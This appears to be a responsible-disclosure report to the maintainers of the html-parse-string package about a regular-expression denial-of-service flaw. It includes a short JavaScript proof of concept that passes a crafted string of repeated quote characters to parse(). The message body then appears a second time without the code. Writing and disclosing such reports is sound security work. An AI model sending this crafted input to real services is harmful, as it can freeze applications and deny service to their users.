Hi,
I would like to report two Regular Expression Denial of Service (REDoS) vulnerability in html-parse-string.
It allows cause a denial of service when parsing crafted invalid HTML strings.
You can execute the code below to reproduce the vulnerability.
var htmlParseString = require("html-parse-string")
htmlParseString.parse('<!""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""!')Feel free to contact me if you have any questions.
Best regards,
Yeting Li
Hi,
I would like to report two Regular Expression Denial of Service (REDoS) vulnerability in
html-parse-string.It allows cause a denial of service when parsing crafted invalid HTML strings.
You can execute the code below to reproduce the vulnerability.
Feel free to contact me if you have any questions.
Best regards,
Yeting Li